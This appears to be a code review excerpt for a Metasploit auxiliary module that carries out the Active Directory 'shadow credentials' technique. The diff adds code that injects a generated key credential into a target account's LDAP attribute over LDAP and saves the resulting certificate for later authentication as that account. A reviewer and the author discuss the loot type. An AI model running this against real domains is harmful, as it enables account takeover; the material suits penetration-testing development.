modules/auxiliary/admin/ldap/shadow_credentials.rb

```diff
@@ -0,0 +1,311 @@
+    credential_entries = obj[ATTRIBUTE]
+    if credential_entries.nil? || credential_entries.empty?
+      print_status("The #{ATTRIBUTE} field is empty. No changes are necessary.")
+      return
+    end
+
+    length_before = credential_entries.length
+    credential_entries.delete_if { |entry| bytes_to_uuid(entry.device_id) == datastore['DEVICE_ID'] }
+    if credential_entries.length == length_before
+      print_status('No matching entries found - check device ID')
+    else
+      update_list = credentials_to_ldap_format(credential_entries, obj['dn'])
+      unless @ldap.replace_attribute(obj['dn'], ATTRIBUTE, update_list)
+        warn_on_likely_user_error
+        fail_with_ldap_error("Failed to update the #{ATTRIBUTE} attribute.")
+      end
+      print_good("Deleted entry with device ID #{datastore['DEVICE_ID']}")
+    end
+  end
+
+  def action_flush(obj)
+    unless obj[ATTRIBUTE]
+      print_status("The #{ATTRIBUTE} field is empty. No changes are necessary.")
+      return
+    end
+
+    unless @ldap.delete_attribute(obj['dn'], ATTRIBUTE)
+      fail_with_ldap_error("Failed to deleted the #{ATTRIBUTE} attribute.")
+    end
+
+    print_good("Successfully deleted the #{ATTRIBUTE} attribute.")
+  end
+
+  def action_add(obj)
+    credential_entries = obj[ATTRIBUTE]
+    if credential_entries.nil?
+      credential_entries = []
+    end
+    key, cert = generate_key_and_cert(datastore['TARGET_USER'])
+    credential = Rex::Proto::MsAdts::KeyCredential.new
+    credential.set_key(key.public_key, Rex::Proto::MsAdts::KeyCredential::KEY_USAGE_NGC)
+    now = ::Time.now
+    credential.set_times(now, now)
+    credential_entries.append(credential)
+    update_list = credentials_to_ldap_format(credential_entries, obj['dn'])
+
+    unless @ldap.replace_attribute(obj['dn'], ATTRIBUTE, update_list)
+      warn_on_likely_user_error
+      fail_with_ldap_error("Failed to update the #{ATTRIBUTE} attribute.")
+    end
+
+    pkcs12 = OpenSSL::PKCS12.create('', '', key, cert)
+    store_cert(pkcs12)
+
+    print_good("Successfully updated the #{ATTRIBUTE} attribute; certificate with device ID #{bytes_to_uuid(credential.device_id)}")
+  end
+
+  def store_cert(pkcs12)
+    service_data = ldap_service_data
+    credential_data = {
+      **service_data,
+      address: service_data[:host],
+      port: rport,
+      protocol: service_data[:proto],
+      service_name: service_data[:name],
+      workspace_id: myworkspace_id,
+      username: datastore['TARGET_USER'],
+      private_type: :pkcs12,
+      # pkcs12 is a binary format, but for persisting we Base64 encode it
+      private_data: Base64.strict_encode64(pkcs12.to_der),
+      origin_type: :service,
+      module_fullname: fullname
+    }
+    create_credential(credential_data)
+
+    info = "#{datastore['DOMAIN']}\\#{datastore['TARGET_USER']} Certificate"
+    stored_path = store_loot('windows.shadowcreds', 'application/x-pkcs12', rhost, pkcs12.to_der, 'certificate.pfx', info)
```

Comment:
When I went to test this and I got to the step where I had to use the certificate with the `get_ticket` module, it didn't work until I had installed AD CS. If that's expected and the certificate is only useful when AD CS is present in the environment, it wold make sense to register the type here as `windows.ad.cs` like the `icpr_cert` module uses. This would ensure that the type and content type form a unique key on how the certificates are able to be used, which will differentiate them from other PFX files we may find in the future that we know are not usable in this same context.

```suggestion
    stored_path = store_loot('windows.ad.cs', 'application/x-pkcs12', rhost, pkcs12.to_der, 'certificate.pfx', info)
```

Reply:
Yeah, fair call. Have updated this here and in the doco page.